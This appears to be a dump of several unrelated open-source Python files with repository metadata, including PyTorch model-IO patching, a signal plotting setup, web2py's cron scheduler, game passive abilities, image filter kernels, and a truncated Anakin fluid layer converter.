2019-08-19T04:17:15.000Z
|
import sys
import six
from pathlib2 import Path
from ...binding.frameworks.base_bind import PatchBaseModelIO
from ..frameworks import _patched_call, WeightsFileHandler, _Empty
from ..import_bind import PostImportHookPatching
from ...config import running_remotely
from ...model import Framework
class PatchPyTorchModelIO(PatchBaseModelIO):
__main_task = None
__patched = None
@staticmethod
def update_current_task(task, **_):
PatchPyTorchModelIO.__main_task = task
PatchPyTorchModelIO._patch_model_io()
PostImportHookPatching.add_on_import('torch', PatchPyTorchModelIO._patch_model_io)
@staticmethod
def _patch_model_io():
if PatchPyTorchModelIO.__patched:
return
if 'torch' not in sys.modules:
return
PatchPyTorchModelIO.__patched = True
# noinspection PyBroadException
try:
            # hack: make sure torch.__init__ is called
import torch
torch.save = _patched_call(torch.save, PatchPyTorchModelIO._save)
torch.load = _patched_call(torch.load, PatchPyTorchModelIO._load)
except ImportError:
pass
except Exception:
pass # print('Failed patching pytorch')
@staticmethod
def _save(original_fn, obj, f, *args, **kwargs):
ret = original_fn(obj, f, *args, **kwargs)
if not PatchPyTorchModelIO.__main_task:
return ret
if isinstance(f, six.string_types):
filename = f
elif hasattr(f, 'name'):
filename = f.name
# noinspection PyBroadException
try:
f.flush()
except Exception:
pass
else:
filename = None
# give the model a descriptive name based on the file name
# noinspection PyBroadException
try:
model_name = Path(filename).stem
except Exception:
model_name = None
WeightsFileHandler.create_output_model(obj, filename, Framework.pytorch, PatchPyTorchModelIO.__main_task,
singlefile=True, model_name=model_name)
return ret
@staticmethod
def _load(original_fn, f, *args, **kwargs):
if isinstance(f, six.string_types):
filename = f
elif hasattr(f, 'name'):
filename = f.name
else:
filename = None
if not PatchPyTorchModelIO.__main_task:
return original_fn(f, *args, **kwargs)
# register input model
empty = _Empty()
if running_remotely():
filename = WeightsFileHandler.restore_weights_file(empty, filename, Framework.pytorch,
PatchPyTorchModelIO.__main_task)
model = original_fn(filename or f, *args, **kwargs)
else:
# try to load model before registering, in case we fail
model = original_fn(filename or f, *args, **kwargs)
WeightsFileHandler.restore_weights_file(empty, filename, Framework.pytorch,
PatchPyTorchModelIO.__main_task)
if empty.trains_in_model:
# noinspection PyBroadException
try:
model.trains_in_model = empty.trains_in_model
except Exception:
pass
return model
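
# Hedged illustration, not part of trains: the patching above relies on
# _patched_call wrapping an original function so the hook receives that original
# callable plus the caller's arguments (see _save/_load above). A minimal
# standalone version of the same idea, with hypothetical names, looks like this:
def _example_patched_call(original_fn, patched_fn):
    def _inner(*args, **kwargs):
        return patched_fn(original_fn, *args, **kwargs)
    return _inner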
| 33.475728
| 113
| 0.604118
|
a6d0dfcbbc999c2d0671c1c39bdd1ed0f81a9bdf
| 5,194
|
py
|
Python
|
src/signal_scope/signalScopeSetup.py
|
TLasguignes/signal_scope
|
ad2690df9c7a5f1502c5e7807568b7f4050fcc10
|
[
"BSD-3-Clause"
] | null | null | null |
src/signal_scope/signalScopeSetup.py
|
TLasguignes/signal_scope
|
ad2690df9c7a5f1502c5e7807568b7f4050fcc10
|
[
"BSD-3-Clause"
] | null | null | null |
src/signal_scope/signalScopeSetup.py
|
TLasguignes/signal_scope
|
ad2690df9c7a5f1502c5e7807568b7f4050fcc10
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import glob
import time
import traceback
from PythonQt import QtGui
class LocalTimeHelper(object):
def _getResolverFunction(self):
return lambda x: time.time()*1e6
class LookupHelper(object):
def __init__(self, lookups=()):
self._lookups = lookups
def __getitem__(self, i):
return LookupHelper(self._lookups + ([i],))
def __getattr__(self, attr):
return LookupHelper(self._lookups + (attr,))
def _getResolverFunction(self):
lookups = []
name = ''
for a in self._lookups:
if isinstance(a, str):
if len(name): name += '.'
name += '%s' % a
f = lambda msg, field, a=a: getattr(field, a)
else:
a = a[0]
if isinstance(a, int):
name += '[%d]' % a
f = lambda msg, field, a=a: field[a]
if isinstance(a, str):
name += "['%s']" % a
def f(msg, field, a=a, data=[]):
if not data:
data.append(field.index(a))
return data[0]
elif isinstance(a, LookupHelper):
key = a._lookups[-1][0]
subFunc = a._getResolverFunction()
name += '[%s]' % key #subFunc.__doc__
f = lambda msg, field, a=a: field[subFunc(msg)]
lookups.append(f)
def func(msg):
value = msg
for x in lookups:
value = x(msg, value)
return value
func.__doc__ = name
return func
def createSignalFunction(timeLookup, valueLookup):
t = timeLookup._getResolverFunction()
v = valueLookup._getResolverFunction()
def func(msg):
return t(msg).to_sec(), v(msg)
func.__doc__ = v.__doc__
return func
def decodeMessageFunction(messageBytes, messageType):
s = str(messageBytes)
# Use messageType string to import ros message type
# TODO:
    # - find out if this is efficient - e.g. at 500Hz
    # - cache the imported messages and skip importing ones that have already been imported
    # - remove the LCM code used for decoding
messagePackage,messageType= str.split(str(messageType),'/')
exec('from ' + messagePackage + '.msg import ' + messageType )
exec('p = ' + messageType + '()')
p.deserialize(s)
return p
msg = LookupHelper()
tNow = LocalTimeHelper()
def setFormatOptions(pointSize=None, timeWindow=None, curveStyle=None):
window = _mainWindow;
if pointSize is not None:
window.onPointSizeChanged(pointSize)
if timeWindow is not None:
window.onTimeWindowChanged(timeWindow)
if curveStyle is not None:
if curveStyle in ["dots","lines"]:
window.onCurveStyleChanged(curveStyle);
def addPlot(pointSize=None, timeWindow=None, yLimits=None):
plot = _mainWindow.addPlot()
if timeWindow is not None:
plot.setTimeWindow(timeWindow)
if yLimits is not None:
plot.setYAxisScale(yLimits[0], yLimits[1])
return plot
def getPlot():
plots = getPlots()
return plots[-1] if plots else None
def getPlots():
return _mainWindow.getPlots()
def removePlots():
_mainWindow.onRemoveAllPlots()
def addSignalFunction(channel, signalFunction, plot=None, color=None, wrap=True, label=None):
if plot is None:
plot = getPlot()
if plot is None:
plot = addPlot()
if color is not None:
rgb = [int(c*255) for c in color]
color = QtGui.QColor(*rgb)
else:
color = QtGui.QColor()
if wrap:
def _signalFunction(x):
t, v = signalFunction(x)
return t.to_sec(), float(v)
else:
_signalFunction = signalFunction
_mainWindow.addPythonSignal(plot, [channel, _signalFunction, label or signalFunction.__doc__, color])
def addSignalFunctions(channel, signalFunction, keys, keyLookup=None, plot=None, colors=None, labels=None):
def func(key, keyStr):
def f (msg):
t, x = signalFunction(msg)
return t, x[key]
if signalFunction.__doc__:
f.__doc__ = signalFunction.__doc__ + " " + keyStr
return f
if colors is None:
colors = [None] * len(keys)
if labels is None:
labels = [None] * len(keys)
for key, color, label in zip(keys, colors, labels):
keyStr = str(key)
if keyLookup is not None:
key = keyLookup[key]
addSignalFunction(channel, func(key,keyStr), plot=plot, color=color, label=label)
def addSignal(channel, timeLookup, valueLookup, plot=None, color=None, label=None):
signalFunction = createSignalFunction(timeLookup, valueLookup)
addSignalFunction(channel, signalFunction, plot=plot, color=color, wrap=False, label=label)
def addSignals(channel, timeLookup, valueLookup, keys, keyLookup=None, plot=None, colors=None, labels=None):
if colors is None:
colors = [None] * len(keys)
if labels is None:
labels = [None] * len(keys)
for key, color, label in zip(keys, colors, labels):
if keyLookup is not None:
key = keyLookup[key]
addSignal(channel, timeLookup, valueLookup[key], plot=plot, color=color, label=label)
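
# Hedged usage sketch, not part of this module: signal-scope user scripts usually
# build plots with addPlot() and attach message fields with addSignal() using the
# `msg` lookup helper. The channel name and message fields below are placeholders
# for a ROS pose-like message.
def _example_setup():
    p = addPlot(timeWindow=15, yLimits=[-1.0, 1.0])
    addSignal('/robot/pose', msg.header.stamp, msg.pose.position.x, plot=p, label='x')
    addSignal('/robot/pose', msg.header.stamp, msg.pose.position.y, plot=p, label='y')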
| 26.100503
| 108
| 0.614555
|
8e6497b9eb8cbc98e054158db3a3b08697328963
| 13,111
|
py
|
Python
|
gluon/newcron.py
|
pav0n/web2py_ohka
|
2d8302e4d1bffc8c845f9e37638a86bb691a8107
|
[
"BSD-3-Clause"
] | 2
|
2017-02-02T00:31:48.000Z
|
2017-08-08T22:36:25.000Z
|
gluon/newcron.py
|
sloe/sloe_web2py
|
a1524d4da46ff851429a1de2022d852f8f2c8e53
|
[
"BSD-3-Clause"
] | null | null | null |
gluon/newcron.py
|
sloe/sloe_web2py
|
a1524d4da46ff851429a1de2022d852f8f2c8e53
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Created by Attila Csipa <web2py@csipa.in.rs>
| Modified by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Cron-style interface
"""
import sys
import os
import threading
import logging
import time
import sched
import re
import datetime
import platform
import portalocker
import fileutils
try:
import cPickle as pickle
except:
import pickle
from gluon.settings import global_settings
logger = logging.getLogger("web2py.cron")
_cron_stopping = False
_cron_subprocs = []
def absolute_path_link(path):
"""
Returns an absolute path for the destination of a symlink
"""
if os.path.islink(path):
link = os.readlink(path)
if not os.path.isabs(link):
link = os.path.join(os.path.dirname(path), link)
else:
link = os.path.abspath(path)
return link
def stopcron():
"Graceful shutdown of cron"
global _cron_stopping
_cron_stopping = True
while _cron_subprocs:
proc = _cron_subprocs.pop()
if proc.poll() is None:
try:
proc.terminate()
except:
import traceback
traceback.print_exc()
class extcron(threading.Thread):
def __init__(self, applications_parent, apps=None):
threading.Thread.__init__(self)
self.setDaemon(False)
self.path = applications_parent
self.apps = apps
# crondance(self.path, 'external', startup=True, apps=self.apps)
def run(self):
if not _cron_stopping:
logger.debug('external cron invocation')
crondance(self.path, 'external', startup=False, apps=self.apps)
class hardcron(threading.Thread):
def __init__(self, applications_parent):
threading.Thread.__init__(self)
self.setDaemon(True)
self.path = applications_parent
crondance(self.path, 'hard', startup=True)
def launch(self):
if not _cron_stopping:
logger.debug('hard cron invocation')
crondance(self.path, 'hard', startup=False)
def run(self):
s = sched.scheduler(time.time, time.sleep)
logger.info('Hard cron daemon started')
while not _cron_stopping:
now = time.time()
s.enter(60 - now % 60, 1, self.launch, ())
s.run()
class softcron(threading.Thread):
def __init__(self, applications_parent):
threading.Thread.__init__(self)
self.path = applications_parent
# crondance(self.path, 'soft', startup=True)
def run(self):
if not _cron_stopping:
logger.debug('soft cron invocation')
crondance(self.path, 'soft', startup=False)
class Token(object):
def __init__(self, path):
self.path = os.path.join(path, 'cron.master')
if not os.path.exists(self.path):
fileutils.write_file(self.path, '', 'wb')
self.master = None
self.now = time.time()
def acquire(self, startup=False):
"""
Returns the time when the lock is acquired or
None if cron already running
lock is implemented by writing a pickle (start, stop) in cron.master
start is time when cron job starts and stop is time when cron completed
stop == 0 if job started but did not yet complete
if a cron job started within less than 60 seconds, acquire returns None
if a cron job started before 60 seconds and did not stop,
a warning is issue "Stale cron.master detected"
"""
if sys.platform == 'win32':
locktime = 59.5
else:
locktime = 59.99
if portalocker.LOCK_EX is None:
logger.warning('WEB2PY CRON: Disabled because no file locking')
return None
self.master = open(self.path, 'rb+')
try:
ret = None
portalocker.lock(self.master, portalocker.LOCK_EX)
try:
(start, stop) = pickle.load(self.master)
except:
(start, stop) = (0, 1)
if startup or self.now - start > locktime:
ret = self.now
if not stop:
# this happens if previous cron job longer than 1 minute
logger.warning('WEB2PY CRON: Stale cron.master detected')
logger.debug('WEB2PY CRON: Acquiring lock')
self.master.seek(0)
pickle.dump((self.now, 0), self.master)
self.master.flush()
finally:
portalocker.unlock(self.master)
if not ret:
# do this so no need to release
self.master.close()
return ret
def release(self):
"""
Writes into cron.master the time when cron job was completed
"""
if not self.master.closed:
portalocker.lock(self.master, portalocker.LOCK_EX)
logger.debug('WEB2PY CRON: Releasing cron lock')
self.master.seek(0)
(start, stop) = pickle.load(self.master)
if start == self.now: # if this is my lock
self.master.seek(0)
pickle.dump((self.now, time.time()), self.master)
portalocker.unlock(self.master)
self.master.close()
def rangetolist(s, period='min'):
retval = []
if s.startswith('*'):
if period == 'min':
s = s.replace('*', '0-59', 1)
elif period == 'hr':
s = s.replace('*', '0-23', 1)
elif period == 'dom':
s = s.replace('*', '1-31', 1)
elif period == 'mon':
s = s.replace('*', '1-12', 1)
elif period == 'dow':
s = s.replace('*', '0-6', 1)
m = re.compile(r'(\d+)-(\d+)/(\d+)')
match = m.match(s)
if match:
for i in range(int(match.group(1)), int(match.group(2)) + 1):
if i % int(match.group(3)) == 0:
retval.append(i)
return retval
def parsecronline(line):
task = {}
if line.startswith('@reboot'):
line = line.replace('@reboot', '-1 * * * *')
elif line.startswith('@yearly'):
line = line.replace('@yearly', '0 0 1 1 *')
elif line.startswith('@annually'):
line = line.replace('@annually', '0 0 1 1 *')
elif line.startswith('@monthly'):
line = line.replace('@monthly', '0 0 1 * *')
elif line.startswith('@weekly'):
line = line.replace('@weekly', '0 0 * * 0')
elif line.startswith('@daily'):
line = line.replace('@daily', '0 0 * * *')
elif line.startswith('@midnight'):
line = line.replace('@midnight', '0 0 * * *')
elif line.startswith('@hourly'):
line = line.replace('@hourly', '0 * * * *')
params = line.strip().split(None, 6)
if len(params) < 7:
return None
daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4,
'fri': 5, 'sat': 6}
for (s, id) in zip(params[:5], ['min', 'hr', 'dom', 'mon', 'dow']):
if not s in [None, '*']:
task[id] = []
vals = s.split(',')
for val in vals:
if val != '-1' and '-' in val and '/' not in val:
val = '%s/1' % val
if '/' in val:
task[id] += rangetolist(val, id)
elif val.isdigit() or val == '-1':
task[id].append(int(val))
elif id == 'dow' and val[:3].lower() in daysofweek:
                    task[id].append(daysofweek[val[:3].lower()])
task['user'] = params[5]
task['cmd'] = params[6]
return task
class cronlauncher(threading.Thread):
def __init__(self, cmd, shell=True):
threading.Thread.__init__(self)
if platform.system() == 'Windows':
shell = False
self.cmd = cmd
self.shell = shell
def run(self):
import subprocess
global _cron_subprocs
if isinstance(self.cmd, (list, tuple)):
cmd = self.cmd
else:
cmd = self.cmd.split()
proc = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=self.shell)
_cron_subprocs.append(proc)
(stdoutdata, stderrdata) = proc.communicate()
try:
_cron_subprocs.remove(proc)
except ValueError:
pass
if proc.returncode != 0:
logger.warning(
'WEB2PY CRON Call returned code %s:\n%s' %
(proc.returncode, stdoutdata + stderrdata))
else:
logger.debug('WEB2PY CRON Call returned success:\n%s'
% stdoutdata)
def crondance(applications_parent, ctype='soft', startup=False, apps=None):
apppath = os.path.join(applications_parent, 'applications')
cron_path = os.path.join(applications_parent)
token = Token(cron_path)
cronmaster = token.acquire(startup=startup)
if not cronmaster:
return
now_s = time.localtime()
checks = (('min', now_s.tm_min),
('hr', now_s.tm_hour),
('mon', now_s.tm_mon),
('dom', now_s.tm_mday),
('dow', (now_s.tm_wday + 1) % 7))
if apps is None:
apps = [x for x in os.listdir(apppath)
if os.path.isdir(os.path.join(apppath, x))]
full_apath_links = set()
for app in apps:
if _cron_stopping:
break
apath = os.path.join(apppath, app)
# if app is a symbolic link to other app, skip it
full_apath_link = absolute_path_link(apath)
if full_apath_link in full_apath_links:
continue
else:
full_apath_links.add(full_apath_link)
cronpath = os.path.join(apath, 'cron')
crontab = os.path.join(cronpath, 'crontab')
if not os.path.exists(crontab):
continue
try:
cronlines = fileutils.readlines_file(crontab, 'rt')
lines = [x.strip() for x in cronlines if x.strip(
) and not x.strip().startswith('#')]
tasks = [parsecronline(cline) for cline in lines]
        except Exception as e:
logger.error('WEB2PY CRON: crontab read error %s' % e)
continue
for task in tasks:
if _cron_stopping:
break
if sys.executable.lower().endswith('pythonservice.exe'):
_python_exe = os.path.join(sys.exec_prefix, 'python.exe')
else:
_python_exe = sys.executable
commands = [_python_exe]
w2p_path = fileutils.abspath('web2py.py', gluon=True)
if os.path.exists(w2p_path):
commands.append(w2p_path)
if applications_parent != global_settings.gluon_parent:
commands.extend(('-f', applications_parent))
citems = [(k in task and not v in task[k]) for k, v in checks]
task_min = task.get('min', [])
if not task:
continue
elif not startup and task_min == [-1]:
continue
elif task_min != [-1] and reduce(lambda a, b: a or b, citems):
continue
logger.info('WEB2PY CRON (%s): %s executing %s in %s at %s'
% (ctype, app, task.get('cmd'),
os.getcwd(), datetime.datetime.now()))
action, command, models = False, task['cmd'], ''
if command.startswith('**'):
(action, models, command) = (True, '', command[2:])
elif command.startswith('*'):
(action, models, command) = (True, '-M', command[1:])
else:
action = False
if action and command.endswith('.py'):
commands.extend(('-J', # cron job
models, # import models?
'-S', app, # app name
'-a', '"<recycle>"', # password
'-R', command)) # command
elif action:
commands.extend(('-J', # cron job
models, # import models?
'-S', app + '/' + command, # app name
'-a', '"<recycle>"')) # password
else:
commands = command
# from python docs:
# You do not need shell=True to run a batch file or
# console-based executable.
shell = False
try:
cronlauncher(commands, shell=shell).start()
            except Exception as e:
logger.warning(
'WEB2PY CRON: Execution error for %s: %s'
% (task.get('cmd'), e))
token.release()
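
# Hedged examples of crontab lines parsecronline() understands (app and script
# names are placeholders). The five cron fields are followed by a user and a
# command; a leading '*' runs the command inside web2py with the app's models
# imported, '**' runs it without importing models, and a plain command is
# executed as an external shell command. '@reboot' entries run only at startup.
#
#     0 3 * * *      root  *applications/myapp/cron/backup.py
#     */30 * * * *   root  **applications/myapp/cron/poll.py
#     @daily         root  /usr/local/bin/cleanup.sh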
| 34.32199
| 79
| 0.530089
|
1d03c9aee09c188288a56fb7ce9845598d7e9034
| 16
|
py
|
Python
|
SoapLibrary/version.py
|
rfabbris/Robot-Framework-SOAP-Library
|
b1c79aed3cfb63a70f301aca33de9256c0d215bb
|
[
"MIT"
] | null | null | null |
SoapLibrary/version.py
|
rfabbris/Robot-Framework-SOAP-Library
|
b1c79aed3cfb63a70f301aca33de9256c0d215bb
|
[
"MIT"
] | null | null | null |
SoapLibrary/version.py
|
rfabbris/Robot-Framework-SOAP-Library
|
b1c79aed3cfb63a70f301aca33de9256c0d215bb
|
[
"MIT"
] | null | null | null |
VERSION = "0.6"
| 8
| 15
| 0.5625
|
d45fd4235e3322c64585fb87a3ba0acdd1282ade
| 3,754
|
py
|
Python
|
passives.py
|
arthur-hav/hexrl
|
31e86e5ba3c2893c16e038fe4809e2f3cc652090
|
[
"MIT"
] | 2
|
2018-08-13T11:34:42.000Z
|
2018-08-19T05:51:29.000Z
|
passives.py
|
arthur-hav/hexrl
|
31e86e5ba3c2893c16e038fe4809e2f3cc652090
|
[
"MIT"
] | 5
|
2018-08-17T12:03:55.000Z
|
2018-08-23T12:03:09.000Z
|
passives.py
|
arthur-hav/hexrl
|
31e86e5ba3c2893c16e038fe4809e2f3cc652090
|
[
"MIT"
] | 4
|
2018-08-17T11:50:31.000Z
|
2018-09-22T08:32:58.000Z
|
class Passive:
def __init__(self, image_name, **kwargs):
self.image_name = image_name
for k, v in kwargs.items():
setattr(self, k, v)
def apply_to(self, creature):
pass
def get_short_desc(self):
pass
class RegenerationPassive(Passive):
def apply_to(self, creature):
old_tick = creature.tick
def new_tick(elapsed_time):
old_tick(elapsed_time)
if creature.health < (self.maxhealth or creature.maxhealth):
creature.health += round(elapsed_time / 100 * self.rate)
creature.tick = new_tick
old_end_game = creature.end_combat
def new_end_game():
old_end_game()
creature.health = max(creature.health, self.maxhealth or creature.maxhealth)
creature.end_combat = new_end_game
def get_short_desc(self):
t = 'Regen %d' % self.rate
if self.maxhealth:
t += ' below %d' % self.maxhealth
return t
def get_description(self):
t = 'Regenerates %d health per turn' % self.rate
if self.maxhealth:
t += ' when below %d health' % self.maxhealth
return t
class HealPassive(Passive):
def apply_to(self, creature):
old_end_combat = creature.end_combat
def new_end_combat():
for cr in creature.combat.creatures.values():
if cr.health > 0:
cr.health += self.amount
cr.health = min(cr.health, cr.maxhealth)
old_end_combat()
creature.end_combat = new_end_combat
def get_short_desc(self):
t = 'Heal %d' % self.amount
return t
def get_description(self):
t = 'Heals all party for %d health after every combat' % self.amount
return t
class ShieldPassive(Passive):
def apply_to(self, creature):
old_end_act = creature.end_act
def end_act():
old_end_act()
creature.shield = max(creature.shield, self.shield)
creature.end_act = end_act
def get_short_desc(self):
return 'Shield %d' % self.shield
def get_description(self):
return 'Every turn, gains a shield preventing %d damage' % self.shield
class Fastcast(Passive):
def apply_to(self, creature):
old_use = creature.use_ability
def use_ability(ability, target):
old_ability_instant = ability.is_instant
ability.is_instant = True
old_use(ability, target)
if old_ability_instant:
return
if creature.free_moves:
creature.free_moves -= 1
else:
creature.end_act()
ability.is_instant = old_ability_instant
creature.use_ability = use_ability
def get_short_desc(self):
return 'Fastcast'
def get_description(self):
return 'Casting abilities cost 1 movement instead of ending turn'
class Quick(Passive):
def apply_to(self, creature):
total_moves = self.bonus_moves + 1
creature.FREE_MOVES = total_moves
def get_short_desc(self):
return 'Quick %d' % self.bonus_moves
def get_description(self):
return 'Gains %d bonus moves' % self.bonus_moves
PASSIVES = {
'Regeneration': (RegenerationPassive, {'name': 'Regeneration', 'image_name':'icons/heartplus.png'}),
'Shield': (ShieldPassive, {'name': 'Shield', 'image_name':'icons/shield-icon.png'}),
'Fastcast': (Fastcast, {'name': 'Fastcast', 'image_name': 'icons/smite.png'}),
'PartyHeal': (HealPassive, {'name': 'PartyHeal', 'image_name':'icons/heart.png'}),
'Quick': (Quick, {'name': 'Quick', 'image_name':'icons/quickness.png'})
}
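
# Hedged usage sketch, not part of the game code: PASSIVES maps a name to a
# (class, kwargs) pair, and extra keyword arguments such as rate/maxhealth end up
# as attributes via Passive.__init__. The creature argument is assumed to expose
# the attributes RegenerationPassive touches (tick, health, maxhealth, end_combat).
def _example_apply_regeneration(creature):
    passive_cls, base_kwargs = PASSIVES['Regeneration']
    passive = passive_cls(rate=2, maxhealth=0, **base_kwargs)
    passive.apply_to(creature)
    return passive.get_short_desc()  # -> 'Regen 2'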
| 30.770492
| 108
| 0.607352
|
1f0772bcb3692ba1355a1a7392722d7b6e1152b7
| 923
|
py
|
Python
|
torchimagefilter/kernel.py
|
pmeier/torchimagefilter
|
a614c0f8167341d7b3c4bdfaefeaf9bddcf05dae
|
[
"BSD-3-Clause"
] | null | null | null |
torchimagefilter/kernel.py
|
pmeier/torchimagefilter
|
a614c0f8167341d7b3c4bdfaefeaf9bddcf05dae
|
[
"BSD-3-Clause"
] | null | null | null |
torchimagefilter/kernel.py
|
pmeier/torchimagefilter
|
a614c0f8167341d7b3c4bdfaefeaf9bddcf05dae
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import torch
__all__ = ["radius_to_size", "gauss_kernel", "box_kernel"]
def radius_to_size(radius: int) -> int:
return 2 * radius + 1
def _normalize_kernel(kernel: torch.Tensor) -> torch.Tensor:
return kernel / torch.sum(kernel)
def box_kernel(radius: int, normalize: bool = True) -> torch.Tensor:
size = radius_to_size(radius)
kernel = torch.ones((size, size))
if normalize:
kernel = _normalize_kernel(kernel)
return kernel
def gauss_kernel(std: float, radius: int, normalize: bool = True) -> torch.Tensor:
var = std ** 2.0
factor = np.sqrt(2.0 * np.pi * var)
exponent = torch.arange(-radius, radius + 1, dtype=torch.float)
exponent = -(exponent ** 2.0) / (2.0 * var)
kernel = (factor * torch.exp(exponent)).unsqueeze(1)
kernel = torch.mm(kernel, kernel.t())
if normalize:
kernel = _normalize_kernel(kernel)
return kernel
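
# Hedged usage sketch: radius 2 gives a 5x5 kernel (see radius_to_size); with
# normalize=True both kernels sum to ~1.0 and can be used directly as filter
# weights.
if __name__ == "__main__":
    g = gauss_kernel(std=1.0, radius=2)
    b = box_kernel(radius=2)
    print(g.shape, float(g.sum()))  # torch.Size([5, 5]) ~1.0
    print(b.shape, float(b.sum()))  # torch.Size([5, 5]) ~1.0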
| 27.969697
| 82
| 0.660888
|
8d8d7eccce8ccf7a09e545739de81071f5b4b6ca
| 374
|
py
|
Python
|
src/commands/set_timer.py
|
PDmatrix/VkBot
|
e5619204d7740fce8ca4a40b49f7a37ba61eba39
|
[
"MIT"
] | 1
|
2018-11-15T18:51:20.000Z
|
2018-11-15T18:51:20.000Z
|
src/commands/set_timer.py
|
PDmatrix/VkBot
|
e5619204d7740fce8ca4a40b49f7a37ba61eba39
|
[
"MIT"
] | null | null | null |
src/commands/set_timer.py
|
PDmatrix/VkBot
|
e5619204d7740fce8ca4a40b49f7a37ba61eba39
|
[
"MIT"
] | 1
|
2018-09-25T21:05:07.000Z
|
2018-09-25T21:05:07.000Z
|
from src import command_system
from src import db_context
def set_timer(user_id):
db_context.set_timer_to_user(user_id)
return "Таймер установлен!"
rep_command = command_system.Command()
rep_command.keys = ['установить', 'установить таймер', 'set', 'set timer']
rep_command.description = 'Установить таймер'  # "Set timer"
rep_command.process = set_timer
rep_command.index = 4
| 24.933333
| 74
| 0.778075
|
46ed423245fdd15b66c9ba22dde6f78694074fab
| 18,637
|
py
|
Python
|
tools/external_converter_v2/parser/kill_fluid/fluid_layer_param_transmit.py
|
mengkai94/Anakin
|
9424277cf9ae180a14aff09560d3cd60a49c76d2
|
[
"Apache-2.0"
] | null | null | null |
tools/external_converter_v2/parser/kill_fluid/fluid_layer_param_transmit.py
|
mengkai94/Anakin
|
9424277cf9ae180a14aff09560d3cd60a49c76d2
|
[
"Apache-2.0"
] | 3
|
2018-06-22T09:08:44.000Z
|
2018-07-04T08:38:30.000Z
|
tools/external_converter_v2/parser/kill_fluid/fluid_layer_param_transmit.py
|
mengkai94/Anakin
|
9424277cf9ae180a14aff09560d3cd60a49c76d2
|
[
"Apache-2.0"
] | null | null | null |
from ..operations import OpsParam, OpsRegister
from ..logger import *
from ..proto import *
from fluid_helper import *
def ParserFeedDecorator(OpName):
def warpper(Parser):
def warpper_args(args):
Parser(args)
OpsRegister()[OpName].feed_node_attr(args[0])
args[2].set_name(OpName)
args[0].set_op(args[2]())
return warpper_args
return warpper
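# Hedged note on the decorator above: every Parser_* function below receives an
# args tuple of roughly (node, op, op_proto_holder, helper, private_data); the
# wrapper then feeds the filled OpsRegister()[OpName] attributes into the node
# and tags it with the Anakin op name. A skeleton parser (with a made-up op and
# attribute name) would therefore look like:
#
#   @ParserFeedDecorator("MyOp")
#   def Parser_my_op(args):
#       op = args[1]
#       helper = args[3]
#       OpsRegister()["MyOp"].some_attr = helper.attr_data(op, 'some_attr')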
# common
def NotNeededInInference(args):
# args is tuple object
node_io = args[0]
layer = args[1]
@ParserFeedDecorator("Input")
def Parser_feed(args):
private_data = args[4]
input_shape = private_data['input_shape']
alias = private_data['alias']
OpsRegister()["Input"].input_shape = input_shape
OpsRegister()["Input"].alias = alias
@ParserFeedDecorator("Convolution")
def Parser_conv2d(args):
op = args[1]
helper = args[3]
private_data = args[4]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Filter')
OpsRegister()["Convolution"].weight_1 = weights_tensor
OpsRegister()["Convolution"].filter_num = weights_shape[0]
OpsRegister()["Convolution"].kernel_size = weights_shape[-2:]
OpsRegister()["Convolution"].strides = helper.attr_data(op, 'strides')
OpsRegister()["Convolution"].padding = helper.attr_data(op, 'paddings')
OpsRegister()["Convolution"].dilation_rate = helper.attr_data(op, 'dilations')
OpsRegister()["Convolution"].group = helper.attr_data(op, 'groups')
OpsRegister()["Convolution"].axis = 1
if 'bias' in private_data.keys():
OpsRegister()["Convolution"].bias_term = True
OpsRegister()["Convolution"].weight_2 = private_data['bias']
else:
OpsRegister()["Convolution"].bias_term = False
@ParserFeedDecorator("ReLU")
def Parser_relu(args):
OpsRegister()["ReLU"].alpha = 0.0
@ParserFeedDecorator("Pooling")
def Parser_pool2d(args):
op = args[1]
helper = args[3]
OpsRegister()["Pooling"].pool_size = helper.attr_data(op, 'ksize')
OpsRegister()["Pooling"].strides = helper.attr_data(op, 'strides')
OpsRegister()["Pooling"].padding = helper.attr_data(op, 'paddings')
OpsRegister()["Pooling"].global_pooling = helper.attr_data(op, 'global_pooling')
if helper.attr_data(op, 'pooling_type') == 'max':
OpsRegister()["Pooling"].method = "MAX"
elif helper.attr_data(op, 'pooling_type') in ['average', 'avg']:
OpsRegister()["Pooling"].method = "AVG"
if helper.attr_data(op, 'ceil_mode') == False:
OpsRegister()["Pooling"].cmp_out_shape_floor_as_conv = True
else:
OpsRegister()["Pooling"].cmp_out_shape_floor_as_conv = False
@ParserFeedDecorator("Dense")
def Parser_mul(args):
op = args[1]
helper = args[3]
private_data = args[4]
weights_needs_trans = True
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Y', weights_needs_trans)
OpsRegister()["Dense"].weight_1 = weights_tensor
OpsRegister()["Dense"].out_dim = weights_shape[2]
OpsRegister()["Dense"].axis = helper.attr_data(op, 'x_num_col_dims')
if 'bias' in private_data.keys():
OpsRegister()["Dense"].bias_term = True
OpsRegister()["Dense"].weight_2 = private_data['bias']
else:
OpsRegister()["Dense"].bias_term = False
@ParserFeedDecorator("Softmax")
def Parser_softmax(args):
private_data = args[4]
if 'axis' in private_data.keys():
axis = private_data['axis']
else:
axis = 1
OpsRegister()["Softmax"].axis = axis
@ParserFeedDecorator("Activation")
def Parser_sigmoid(args):
OpsRegister()["Activation"].type = "Sigmoid"
@ParserFeedDecorator("Axpy")
def Parser_axpy(args):
pass
@ParserFeedDecorator("BatchNorm")
def Parser_batch_norm(args):
op = args[1]
helper = args[3]
OpsRegister()["BatchNorm"].weight_1 = helper.param_tensor(op, 'Mean')
OpsRegister()["BatchNorm"].weight_2 = helper.param_tensor(op, 'Variance')
OpsRegister()["BatchNorm"].weight_3 = helper.create_tensor([1], [1, 1, 1, 1], FLOAT)
OpsRegister()["BatchNorm"].momentum = helper.attr_data(op, 'momentum')
OpsRegister()["BatchNorm"].epsilon = helper.attr_data(op, 'epsilon')
@ParserFeedDecorator("Scale")
def Parser_scale_disc_bn(args):
op = args[1]
helper = args[3]
mean = helper.np_param(op, 'Mean')
var = helper.np_param(op, 'Variance')
alpha = helper.np_param(op, 'Scale')
